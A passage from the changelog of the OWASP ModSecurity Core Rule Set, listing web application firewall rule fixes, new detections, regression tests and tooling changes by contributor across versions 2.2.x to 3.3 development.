Drop escapes (Christian Folini) +* Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) +* Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) +* Remove trailing dot in several msg actions (#1678) (Tim Herren) +* Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (Andrea Menin) +* Temporary travis workaround to buy time and fix it for good (#1684) (Andrea Menin) +* Add regression tests (Franziska Bühler) +* Fix FP with create with 942360 (Franziska Bühler) +* Avoid embedded anchors in CRS rule 942330 (Allan Boll) +* Update 942450 for less false positives, more tests (#1662) (Will Woodson) +* Ensure single ranges are also checked (#1661) (Federico G. Schwindt) +* WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop) +* For bugs, also ask for the environment (#1657) (Federico G. Schwindt) +* XenForo: fix incorrect escape (Walter Hop) +* XenForo: additional exclusions (Walter Hop) +* Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt) +* Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference. +* Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt) +* Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt) +* Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner) +* Also ask for the paranoia level (Federico G. Schwindt) +* Make it a tiny bit more colorful (Federico G. Schwindt) +* Spacing (Federico G. Schwindt) +* Fix emoji (Federico G. Schwindt) +* Switch to multiple templates for github issues (#1644) (Federico G. Schwindt) +* Fix paranoia-level log description (Andrea Menin) +* change IRC to Slack (Walter Hop) +* fix spacing (Walter Hop) +* Moving tests and documentation folders (#1627) (Soufiane Benali) +* add triggered rule (#1636) (Andrea Menin) +* Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt) +* Mark stale issues (Federico G. Schwindt) +* Added support for >). Use negated classes for better performance. (Federico G. Schwindt) +* Add test for issue #1580 (#1612) (Federico G. Schwindt) +* removes t:lowercase (Andrea Menin) +* Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt) +* Add PL1 tag. (Anna Winkler) +* Change version number for full version name (Felipe Zipitria) +* Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria) +* Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria) +* Ignore configuration files generated by the JetBrains editors (Anna Winkler) +* Update name of branch to use for feature branches. Minor syntax updates. (Anna Winkler) +* Minor optimisation (Emile-Hugo SPIR) +* Also fix the `as herefrom` pattern (Emile-Hugo SPIR) +* More conservative fix (Emile-Hugo SPIR) +* Update the source file (Emile-Hugo SPIR) +* Fix a FP (`, aside from`) (Emile-Hugo SPIR) +* regression fix for #1581 (emphazer) +* Change order to check ip first in both rules (Felipe Zipitria) +* Change chain order (Felipe Zipitria) +* Fix spacing in text (Felipe Zipitria) +* Add link to mailing list archives (Felipe Zipitria) +* Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941270 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 942180 based on XSS cheatsheet by portswigger (Christian Folini) +* Update mailing list links to google group (Felipe Zipitria) +* Fix typo and add 2 new entries to 941160 (Franziska Bühler) +* Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) +* Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) +* Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) +* 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) +* Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) +* fix rule regex due to remove t:removeComments (Andrea Menin) +* 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) +* update Dockerfiles and Travis to use v3.3/dev (Walter Hop) + +## Version 3.2.0 - 2019-09-24 + +New functionality: + +* Add AngularJS client side template injection 941380 PL2 (Franziska Bühler) +* Add docker-compose.yaml and example rule exclusion files for docker-compose (Franziska Bühler) +* Add extended access.log format to Docker (Franziska Bühler) +* Add libinjection check on last path segment (Max Leske, Christian Folini) +* Add PUBLIC identifier for XML entities (#1490) (Rufus125) +* Add .rdb to default restricted_extensions (Walter Hop) +* Add .swp to default restricted_extensions (Andrea Menin) +* Add rule 933200 PHP Wrappers (Andrea Menin) +* Add send-payload-pls.sh script to test payload against multiple paranoia levels (Christian Folini, Manuel Spartan) +* Add support for shell evasions with $IFS (Walter Hop, Chaim Sanders) +* Add unix-shell commands (Christoph Hansen, Chaim Sanders) +* Also inspect the path for the script tag (Federico G. Schwindt) +* Detect 80legs, sysscan, Gobuster scanners (Brent Clark) +* Detect CGI source code leakages (Christoph Hansen, Walter Hop) +* Detect 'crawler' user-agent (Federico G. Schwindt) +* Detect Jorgee, Zgrab scanners (Walter Hop) +* Detect MySQL in-line comments (Franziska Bühler) +* Detect Wappalyzer scanner (Christian Folini, Chaim Sanders) +* Java RCE: Add struts namespaces (Walter Hop) +* Java RCE: Detect more java classes (Manuel Leos) +* Javascript: Add 941370 preventing a bypass for 941180 (Andrea Menin) +* Make CRS variables configurable in Docker image (Franziska Bühler) +* New PL3 rule 920490 to protect against content-type charset bypassing (Christian Folini) +* Node.js unserialization + javascript RCE snippets (Walter Hop) +* Request smuggling: Also cover pre http/1.0 requests (Federico G. Schwindt) +* Restricted files: Added many dotfiles (Dan Ehrlich) +* SQLi bypass detection: ticks and backticks (Franziska Bühler) +* XenForo rule exclusion profile (Walter Hop) + +Removed functionality: + +* Remove unused protected_uploads setting from setup (Walter Hop) +* Remove deprecated tx.msg and tx.%{rule.id}-... (Federico G. Schwindt) +* Remove deprecated upgrade script (Walter Hop) + +Improved compatibility: + +* Add OWASP_CRS tags for ModSec 3 changes and replace ruleRemoveTargetByTag arguments (Ervin Hegedus) +* Replace @contain % with @rx 25; ModSec 3 fails to parse % by itself (or escaped). (Federico G. Schwindt) +* RE2 compatibility for 941130, 920220, 920240, 920230, 920460, 942200, 942370 (Allan Boll) +* Hyperscan compatibility and simplification for 942450 (Allan Boll) + +Fixes and improvements: + +* 932140: fix ReDoS in FOR expression (Walter Hop) +* 933200: Simplify pattern (Federico G. Schwindt, Andrea Menin) +* 941380: fix anomaly score variable (Franziska Bühler) +* 942510, 942511: fix anomaly score variable (Walter Hop) +* Add content-type application/csp-report (Andrea Menin) +* Add content-type application/xss-auditor-report (Andrea Menin) +* Add CRS 3.2 Badge build support. (Chaim Sanders) +* Add CVE numbers for Apache Struts vulnerabilities to comments in rules (Franziska Bühler) +* Add CVE-2018-11776 to comments of 933160 and 933161 (Franziska Bühler) +* Add CVE-2018-2380 to comments of rules (Franziska Bühler) +* Add default env vars for anomaly scores in Docker (Franziska Bühler) +* Add missing OWASP_CRS tags to 921xxx rules (Walter Hop) +* Add REQUEST_FILENAME to rule id 944130 and add exploits to comment (Franziska Bühler) +* Add spaces in front of closing square brackets (Franziska Bühler) +* Add travis changes (#1316) (Chaim Sanders) +* Allow dot characters in Content-Type multipart boundary (Walter Hop) +* Also handle dot variant of X_Filename. PHP will transform dots to underscore in variable names since dot is invalid. (Federico G. Schwindt) +* As per the ref manual, it is compressWhitespace (Federico G. Schwindt) +* Avoid php leak false positive with WOFF files (Manuel Spartan) +* Bring back CRS 2.x renumbering utility (Walter Hop) +* Clean up travis and reorg (Federico G. Schwindt) +* Code cosmetics: reorder the actions of rules (Ervin Hegedus) +* Content-Type is case insensitive (Federico G. Schwindt) +* Disassembled 941160 (Franziska Bühler) +* Drop separate regexp files. They are not really needed and save us from updating multiple places. (Federico G. Schwindt) +* Drop t:lowercase from 941350 (Federico G. Schwindt) +* Drop unneeded capture groups and tidy up (Federico G. Schwindt) +* Drop unneeded capture groups and tidy up regexps (Federico G. Schwindt) +* Drop unneeded unicode from 941110. Add tests to cover a few more variants as well as a negative test (Federico G. Schwindt) +* Fix 920440 "URL file extension is restricted by policy" regex (Andrea Menin) +* Fix 920460 test (Federico G. Schwindt) +* Fix 942101 and 942460 by adding to sqli_score variable (Christian Folini) +* Fix checking the existence of 'HTTP' trailing request verb and request path in the payload for HTTP request smuggling; decreases false-positives on free-form text. (Yu Yagihashi) +* Fix commit default for non 2.9 branch (Chaim Sanders) +* Fix CRS2->CRS3 mapping table (973344 -> 941100) (Chaim Sanders) +* Fix date (Chaim Sanders) +* Fix Docker image SSL support (Franziska Bühler) +* Fix duplicate .env (jschleus, Chaim Sanders) +* Fix executing paranoia level counters (Christian Folini) +* Fix indentation and python version in crs2-renumbering script (Chaim Sanders) +* Fix input / headers misordering (Christian Folini) +* Fix path traversal attack pattern at id:930110 (Ervin Hegedus) +* Fix regexp in Docker image (Franziska Bühler) +* Fix regexp with incorrect dot '.' escape in rule 943120 (XeroChen) +* Fix request header Sec-Fetch-User false positive (na1ex) +* Fix runaway regexp in 942260. Add variant regexp assemble script to handle possessive qualifiers. Use possessive qualifiers to tight this up and solve ReDoS problem. (Federico G. Schwindt) +* Fix small typo in variable (Felipe Zipitria) +* Fix spelling error in variable name (supplient) +* Fix transform name pointed out by secrules_parsing (Federico G. Schwindt) +* Fix Travis Merge not being able to find HEAD (Chaim Sanders) +* Fix vulnerable regexp in rule 942490 (CVE-2019-11387) (Christoph Hansen) +* Fix wrong regex, assembly result, in 942370 (Franziska Bühler) +* INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop) +* Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan) +* Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen) +* Mark patterns not supported by re2 (Federico G. Schwindt) +* Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt) +* Move PROXYLOCATION var (Franziska Bühler) +* PHP: move get_defined_functions() and friends into PL1 (Walter Hop) +* Pin the ftw version to 1.1.7 for now (Federico G. Schwindt) +* Prevent bypass 933180 PHP Variable Function (Andrea Menin) +* Reduce comments, introduction of triggered exploits (Franziska Bühler) +* Remove all trailing spaces from ftw yaml test files (Ervin Hegedus) +* Remove auditlog No other rules specify it. Add missing quotes and drop rev (Federico G. Schwindt) +* Remove capture, remove tx.0, add transformation functions, fix regex, add presentation link (Andrea Menin) +* Remove old and unwanted setvar constructs (Federico G. Schwindt) +* Remove superfluous comments (Walter Hop) +* Remove superfluous pmf (Federico G. Schwindt) +* Remove t:lowercase from 920490 (Christian Folini) +* Remove WARNING from php-errors.data (Andrea Menin) +* Reorder actions (Federico G. Schwindt) +* Replacing all @pmf with @pmFromFile (Christian Treutler) +* Restricted-files.data: add AWS config (Walter Hop) +* SQLI: removed unnecessary + (Christoph Hansen) +* Switch Docker image to owasp/modsecurity:2.9-apache-ubuntu (Federico G. Schwindt) +* unix-shell.data: fix typo in 'more' (Walter Hop) +* Update .travis.yml Update to support v3.1 (Chaim Sanders) +* Update dockerfile to always use 3.2/dev (Federico G. Schwindt) +* Update OWASP CRS Docker image to support the new upstream and 2.9.3 (Peter Bittner, Chaim Sanders) +* Update RESPONSE-950-DATA-LEAKAGES.conf (Christoph Hansen) +* Update RESPONSE-959-BLOCKING-EVALUATION.conf (Christoph Hansen) +* Wordpress: add support for Gutenberg editor (siric_, Walter Hop) +* Wordpress: allow searching for any term in admin posts/pages overview (Walter Hop) +* WordPress: exclude Gutenberg via rest_route (Walter Hop) +* WordPress: exclude some more profile.php fields from RFI rule (Walter Hop) +* WordPress: exclude SQL comment rule from _wp_http_referer (Walter Hop) +* XML Soap Encoding fix 920240 (Christoph Hansen) + +Unit tests: + +* 932140: add regression tests (Walter Hop) +* 933180: fix tests which were doing nothing (Walter Hop) +* 941370: add some more tests, fix whitespace (Walter Hop) +* Add more tests for 941130 (Christian Folini) +* Add regression test for 941101 (Avery Wong) +* Add regression tests for 942150, 942100, 942260 (Christian Folini) +* Add regression tests to 941160 (Franziska Bühler) +* Add some regression tests (Ervin Hegedus) +* Add testing support for libmodsecurity running on Apache and Nginx (Chaim Sanders) +* Add tests for 941360 that fights JSFuck and Hieroglyphy (Christian Folini) +* Add tests for rule 921110 (Yu Yagihashi) +* Added regression tests for rules 942320, 942360, 942361, 942210, 942380, 942410, 942470, 942120, 942240, 942160, 942190, 942140, 942490, 942120 (Christoph Hansen) +* Drop tests for removed rules (Federico G. Schwindt) +* Fix failing regression tests (Ervin Hegedus) +* Fix failing tests (Manuel Spartan, Chaim Sanders) +* Fix readme typos in example rule (Walter Hop) +* Fix test 941110-2 (Federico G. Schwindt) +* Fix YAML 1.2 compliance with "true" (Federico G. Schwindt) +* RCE: Add tests for the for command (Federico G. Schwindt) +* Update regression tests for rules 931110, 931120, 931130 (Simon Studer) + +Documentation: + +* Add details to README for Dockerhub (Franziska Bühler) +* Add intro/comment to CVE comments (Franziska Bühler) +* CONTRIBUTING: add note about separate PRs (Walter Hop) +* Erased gitter chat. Added CII badge (Felipe Zipitria) +* Replaced descriptions (Christian Folini) +* Summarized authors on single line in tests for 941160 (Christian Folini) +* Update broken link in regexp-assemble blog URLs (Walter Hop) +* Update CONTRIBUTING.md To base changes on v3.2/dev. (Felipe Zipitría) +* Update CONTRIBUTORS order (Andrea Menin) +* Update README.md (Rufus125) +* Updating crs site location (Chaim Sanders) + +## Version 3.1.1 - 2019-06-26 + +* Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt) +* Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt) +* Allow % encoding in 920240 (Christoph Hansen) +* Fix bug in 920440 (Andrea Menin) +* Fix bug in 920470 (Walter Hop) +* Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt) +* Fix bug in 943120 (XeroChen) + +## Version 3.1.0 - 2018-08-07 + +* Add Detectify scanner (Andrea Menin) +* Renaming matched_var/s (Victor Hora) +* Remove lines with bare '#' comment char (Walter Hop) +* Drop the XML variable from rule 932190 (Federico G. Schwindt) +* Update outdated URLs (Walter Hop) +* remove unused rule 901180 (Walter Hop) +* Drop exit from unix and windows RCE (Federico G. Schwindt) +* Fix anomaly_score counters (Federico G. Schwindt) +* Remove mostly redundant 944220 in favor of 944240 (Christian Folini) +* Add self[ and document[ to rule 941180 (Andrea Menin) +* Provide proxy support within CRS docker image (Scott O'Neil) +* Prevent bypass in rule 930120 PL3 (Andrea Menin) +* Fix small typo in variable (Felipe Zipitría) +* Fix bug #1166 in Docker image (Franziska Bühler) +* Remove revision status from rules (Federico G. Schwindt) +* Add template for issues (Federico G. Schwindt) +* Correct failing travis tests in merge situations (Federico G. Schwindt) +* Remove unused global variable in IIS rules (Chaim Sanders) +* Refactor to use phase number instead of name (Federico G. Schwindt) +* Add uploaded file name check; refresh LFI / filename checks (Walter Hop) +* Introduce critical sibling of 920340 in PL2 (Walter Hop) +* Fix bypass caused by multiple spaces in RCE rules (Walter Hop) +* Remove unneeded regex capture groups (Federico G. Schwindt) +* Add built-in exceptions for CPanel (Christoph Hansen) +* Add additional file restrictios for ws_ftp, DS_Store... (Jose Nazario) +* Fix missing strings in 942410 (Franziska Bühler) +* Add 2 missing PDO errors (Christoph Hansen) +* Fix issues with FPs in regression tests (Chaim Sanders) +* Add Nextcloud client exclusion support (Christoph Hansen) +* Fix spelling mistakes in REQUEST-942- (Padraig Doran, Chaim Sanders) +* Explicitly ignore the user defined rules (Aaron Haaf, Chaim Sanders) +* Add regression tests for 942490 (Christoph Hansen, Chaim Sanders) +* Add Owncloud client exclusion support (Christoph Hansen, Christian Folini) +* Adding 'F-Secure Radar' vulnerability scanner UA (Christian Folini, Chaim Sanders) +* Update DockerFile to use Ubuntu as base (Chaim Sanders) +* False positives 942360: move alter and union (Franziska Bühler, Chaim Sanders) +* Add support for Java style attacks (Manuel Spartan, Walter Hop) +* Fix various regression tests issues caused by webserver handling (azhao155, Chaim Sanders) +* Update TravisCI to build on a per PR basis (Chaim Sanders) +* Optimized rule 921160 and regex (Allan Boll, Chaim Sanders) +* Update the consistency across various files (Federico G. Schwindt) +* Add missing transform, 944120 sibling 944240 (Manuel Spartan) +* Fix false positive for 'like' in 942120 (Walter Hop) +* Add regression tests for Java Rules (Manuel Spartan) +* Fixup and small reorg of dokuwiki rule exclusion package (Christian Folini) +* Make TravisCI tests fail if Apache can't load rules (Felipe Zipitría) +* Add exclusion rules for Dokuwiki (Matt Bagley, Christian Folini) +* Initial exclusions for NextCloud installs (Matt Bagley, Christian Folini) +* Added struts-pwn UA to list (Manuel Spartan) +* Uses MULTIPART_MISSING_SEMICOLON instead of MULTIPART_SEMICOLON_MISSING (Felipe Zimmerle) +* Add file upload checks (Manuel Spartan) +* Check if Transfer-Encoding is missing (Federico G. Schwindt, Christian Folini) +* Remove duplicated variables (Federico G. Schwindt) +* Reduce FP by splitting classic SQL injection rule 942370 (Christoph Hansen) +* Fix typo in REQUEST-920-PROTOCOL-ENFORCEMENT (ihacku, Franziska Bühler) +* Add configurable timestamp format to FTW integration (Christian Folini) +* Add badges to README (Felipe Zipitría) +* Add clarifying comments to 910110 (Christian Folini) +* Making rule 933131 case-insensitive (Manuel Spartan) +* Merge and reorder rules as part of cleanup (Federico G. Schwindt) +* Update copyright date and syntax (Jose Nazario, Felipe Zipitría) +* Updated SecMarker and SkipAfter names to use meet guidelines (Felipe Zipitría) +* Tidy up single quotes and other guidelines updates (Felipe Zipitría) +* Syntax fix for setvar crs_exclusions_wordpress (Manuel Spartan) +* Updated various contributors to developers (Christian Folini) +* Revise SQL rules by disassembling them into their core protections (Franziska Bühler) +* Add an example payload to 920220 (coolt) +* Add a missing regex to rule 942310 (Franziska Bühler) +* Detect GET or HEAD with Transfer-Encoding header (Federico G. Schwindt) +* Fix broken links in references (Pásztor Gábor) +* Add contributing guidelines (Felipe Zipitría) +* Fix processing bypasses in rule 931130 (Felipe Zipitría, Christian Folini) +* Correct small omissions in unix-shell.data (Walter Hop) +* Add IIS specific detection to LFI-os-files.data (Manuel Spartan) +* Update examples to match the current cleanup (Federico G. Schwindt) +* Corrected the ordering of actions to meet guidelines (Felipe Zipitría) +* Remove unused capture groups (Federico G. Schwindt) +* Use explicit rx operator (Federico G. Schwindt) +* Update the RCE regular expressions(Walter Hop, Federico G. Schwindt) +* Removing maturity & accuracy from rules (Felipe Zipitría) +* Increasing range header (Christoph Hansen) +* Fixed upgrade.py script argument options (Glyn Mooney) +* Updating to reflect OWASP flagship status (Chaim Sanders) +* Adding Docker support for CRS (Chaim Sanders) +* Initial Travis deployment (Zack Allen, Walter Hop) +* Initial commit of regression tests (Chaim Sanders, Walter Hop) +* Remove test for 921170 because it won't ever fire (Chaim Sanders, Walter Hop) +* Update minor incorrectness in asp.net regex (Chaim Sanders, Walter Hop) +* Add notification for builds against #modsecurity on freenode (Zack Allen, Walter Hop) +* Add all past code contributors and convert to markdown (Walter Hop) +* Block uploads of files with .phps extension (Walter Hop) +* Improve message for script upload with superfluous extension (Walter Hop) +* Remove trailing whitespace in various regexs (Walter Hop) +* Add command popd to direct unix rce list in rule 932150 (Franziska Bühler) +* Remove unnecessary END_XSS_CHECKS marker (Christian Folini) +* Ignore Whitespaces in Rule 942110 (Christoph Hansen) +* Update missing RCE Commands (Umar Farook) +* Update lfi-os-files.data (Umar Farook) +* Removed deprecated t:removeComments from 942100 (Christian Folini) +* Add word boundary to rule 942410 (Franziska Bühler) + +## Version 3.0.2 - 2017-05-12 + +* Remove debug rule that popped up in 3.0.1 (Christian Folini) + +## Version 3.0.1 - 2017-05-09 + +* SECURITY: Removed insecure handling of X-Forwarded-For header; + reported by Christoph Hansen (Walter Hop) +* Fixed documentation errors in RESPONSE-999-... (Chaim Sanders) +* Reduced FPs on 942190 by adding a word boundary to regex (Franziska Bühler) +* Reduced FPs on 932150 by removing keyword reset (Franziska Bühler) +* Tidied exceptions in 930100 (Roberto Paprocki) +* Reduced FPs for 920120 by splitting into stricter sibling (Franziska Bühler) +* Simplified some Drupal rule exclusions (Damien McKenna, Christian Folini) +* Extended KNOWN_BUGS with remarks on JSON support on Debian (Franziska Bühler) +* Updated README to add gitter support (Chaim Sanders) +* Clarified DoS documentation for static extensions (Roberto Paprocki) +* Added application/octet-stream to allowed content types (Christian Folini) +* Typo in 942220 alert message (Chaim Sanders, @bossloper) +* Moved referrer check of 941100 into new PL2 rule (Franziska Bühler) +* Closed multiple @pmf evasions via lowercase transformation (Roberto Paprocki) +* Clarified libinjection bundling in INSTALL file (@cjdp) +* Reduced FPs via Wordpress Rule Exclusions (Walter Hop) +* Support for RFC 3902 (Content Type application/soap+xml; Christoph Hansen) + Make sure you update ModSecurity recommended rule 200000 as well. +* Bugfix in 942410 regex (Christian Folini) +* Reduced FPs for 942360 (Walter Hop) +* Reduced FPs for 941120 by restricting event handler names (Franziska Bühler) +* Extended 931000 with scheme "file" to fix false negative (Federico Schwindt) +* Extended 905100 and 905110 for HTTP/2.0 (includes bugfix, Christoph Hansen) +* Moved 941150 from PL1 to PL2; includes Bugfix for rule (Christian Folini) +* Updated documentation for 920260 (Chaim Sanders) +* Bugfix in upgrade.py (Victor Hora) +* Fixed FP in RCE rule 932140 (Walter Hop) +* Fixed comment for arg limit check rule 920370 (Christian Folini) +* Created CONTRIBUTORS file +* Added Christoph Hansen (emphazer) to CONTRIBUTORS file +* Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file +* Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) + +## Version 3.0.0 - 2016-11-10 + +Huge changeset running in separate branch from September 2013 to September 2016. +This is a cursory summary of the most important changes: + +* Huge reduction of false positives (Ryan Barnett, Felipe Zimmerle, Chaim + Sanders, Walter Hop, Christian Folini) +* Anomaly scoring is the new default, renamed thresholds from + tx.(in|out)bound_anomaly_score_level to + tx.(in|out)bound_anomaly_score_threshold +* Introduction of libinjection for SQLi detection +* Introduction of libinjection for XSS detection +* Big improvement on detection of Remote Command Execution (Walter Hop) +* Big improvement on PHP function name detection (Walter Hop) +* Paranoia Mode (Christian Folini, Noël Zindel, Franziska Bühler, + Manuel Leos, Walter Hop) +* Shifted dozens of rules into higher paranoia levels +* Introduced a lot of stricter sibling rules in higher levels +* Generic mechanism to support application specific rule exclusions + (Chaim Sanders) +* Initial Wordpress rule exclusions (Walter Hop) +* Initial Drupal rule exclusions (Christian Folini, @emphazer) +* Renumbering of rules. See folder id_renumbering for a + csv map (Chaim Sanders) +* Consolidation of rules, namely XSS and SQLi (Spider Labs/Trustwave team) +* Sampling mode / Easing in (Christian Folini) +* Cleanup of reputation checks / persistent blocking + (Christian Folini / Walter Hop) +* Tags much more systematic (Walter Hop) +* IP reputation checks / persistent blocking of certain clients + (Spider Labs/Trustwave team) +* Phase actions use request/response/logging now instead of + numerical phases (Spider Labs/Trustwave team) +* Added NoScript XSS Filters (Spider Labs/Trustwave team) +* Updated "severity" action to use words (CRITICAL, WARNING, etc...) + vs. numbers (5, 4, etc..) +* Various regex fixes after research by Vladimir Ivanov (Chaim Sanders) +* Overhaul of the regression mode into debug mode (Walter Hop, Ryan Barnett) +* Introduction of util/upgrade.py (Walter Hop) +* Removal of GeoIP database. Download via util/upgrade.py now. +* Introduction of Initialization rules with + default values (Walter Hop, Christian Folini) +* Sorting out terminology with + whitelisting and rule exclusions (Christian Folini) +* Overhaul of testing (Chaim Sanders) +* Protection from HTTP Parameter Pollution (Franziska Bühler) +* Simplification of setup config file, renamed file to crs-setup.conf.example +* Improved session fixation detection logic (Christian Peron, credits to + Eric Hodel for the discovery) +* Updated list of malicious webscanners +* Splitting scanner user agents data files (github user @ygrek) +* Countless bugfixes in severities, anomaly scores, tags, etc. + across the board +* Cleanup of formerly experimental DDoS rules, + fix documentation (Ryan Barnett, Christian Folini) +* Improves http blacklist checks (Walter Hop) +* Extended XSS detection (as suggested by Mazin Ahmed) +* Added support for Travis CI +* Added support for HTTP/2 in recent Apache 2.4 (Walter Hop) +* Added many, many bots and scanners (among others suggested by + github user @toby78, @jamuse, Matt Koch) +* Fixed mime types suitable for XML processor (Chaim Sanders) +* Include script in util/join-multiline-rules to work around + Apache 2.4 < 2.4.11 bug with long lines (Walter Hop) +* New detection for request smuggling attacks (Achim Hofmann, + Christian Folini) +* Fixes with project honeypot setup (Ryan Barnett) +* Separated DB / SQL messages by DB software (Ryan Barnett) +* CPanel integration (Chaim Sanders) +* Introduction of var for static resources (Chaim Sanders) +* Many improvements to rules in 2014/5 (Ryan Barnett) + +## Version 2.2.9 - 2013-09-30 + +Improvements: + +* Updated the /util directory structure + +Bug Fixes: + +* fix 950901 - word boundary added +* modsecurity_35_bad_robots.data - gecko/25 blocks Firefox Android + + +## Version 2.2.8 - 2013-06-30 + +Improvements: + +* Updatd the /util directory structure +* Added scripts to check Rule ID duplicates +* Added script to remove v2.7 actions so older ModSecurity rules will work + * +* Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope) + * + * + +Bug Fixes: + +* fix 950901 - word boundary added + * +* fix regex error + * +* Updated the Regex in 981244 to include word boundaries + * +* Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2 + * +* ModSecurity: No action id present within the rule - ignore_static.conf + * +* "Bad robots" rule blocks all Java applets on Windows XP machines + * +* duplicated rules id 981173 + * + +## Version 2.2.7 - 2012-12-19 + +Improvements: + +* Added JS Overrides file to identify successful XSS probes +* Added new XSS Detection Rules from Ashar Javed () + * +* Updated the SQLi Filters to add in Oracle specific functions + * + +Bug Fixes: + +* Fixed Session Hijacking rules + * +* Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable + +## Version 2.2.6 - 2012-09-14 + +Improvements: + +* Started rule formatting update for better readability +* Added maturity and accuracy action data to each rule +* Updated rule revision (rev) action +* Added rule version (ver) action +* Added more regression tests (util/regression_tests/) +* Modified Rule ID 960342 to block large file attachments in phase:1 +* Removed all PARANOID rule checks +* Added new Session Fixation rules + +Bug Fixes: + +* Fixed missing ending double-quotes in XSS rules file +* Moved SecDefaultAction setting from phase:2 to phase:1 +* Fixed Session Hijacking SessionID Regex + +* Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME + + +## Version 2.2.5 - 2012-06-14 + +Security Fixes: + +* Updated the anomaly scoring value for rule ID 960000 to critical + (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) + () +* Updated Content-Type check to fix possible evasion with @within + (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) + () + +Improvements: + +* Renamed main config file to modsecurity_crs_10_setup.conf +* Updated the rule IDs to start from CRS reserved range: 900000 +* Updated rule formatting for readability +* Updated the CSRF rules to use UNIQUE_ID as the token source +* Added the zap2modsec.pl script to the /util directory which converts + OWASP ZAP Scanner XML data into ModSecurity Virtual Patches +* Updated the Directory Traversal Signatures to include more obfuscated data +* Added Arachni Scanner Integration Lua script/rules files + +Bug Fixes: + +* Added forceRequestBodyVariable action to rule ID 960904 + +## Version 2.2.4 - 2012-03-14 + +Improvements: + +* Added Location and Set-Cookie checks to Response Splitting rule ID 950910 +* Added a README file to the activated_rules directory +* Consolidate a number of SQL Injection rules into optimized regexs +* Removed multiMatch and replaceComments from SQL Injection rules +* Updated the SQLi regexs for greediness +* Updated the SQLi setvar anomaly score values to use macro expansion +* Removed PARANOID mode rules + +Bug Fixes: + +* Fixed missing comma before severity action in rules 958291, 958230 and 958231 +* Fixed duplidate rule IDs + +## Version 2.2.3 - 2011-12-19 + +Improvements: + +* Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file + +* Added Watcher Charset Checks to optional_rules/modsecurity_crs_55_application_defects.conf file + +* Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file + + +Bug Fixes: + +* Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to + rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs). +* Updated the regex and added tags for RFI rules. + +## Version 2.2.2 - 2011-09-28 + +Improvements: + +* Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points +* Added new Range header detection checks to prevent Apache DoS +* Added new Security Scanner User-Agent strings +* Added example script to the /util directory to convert Arachni DAST scanner + XML data into ModSecurity virtual patching rules. +* Updated the SQLi Character Anomaly Detection Rules +* Added Host header info to the RESOURCE collection key for AppSensor profiling rules + +Bug Fixes: + +* Fixed action list for XSS rules (replaced pass,nolog,auditlog with block) +* Fixed Request Limit rules by removing & from variables +* Fixed Session Hijacking IP/UA hash captures +* Updated the SQLi regex for rule ID 981242 + +## Version 2.2.1 - 2011-07-20 + +Improvements: + +* Extensive SQL Injection signature updates as a result of the SQLi Challenge + +* Updated the SQL Error message detection in response bodies +* Updated SQL Injection signatures to include more DB functions +* Updated 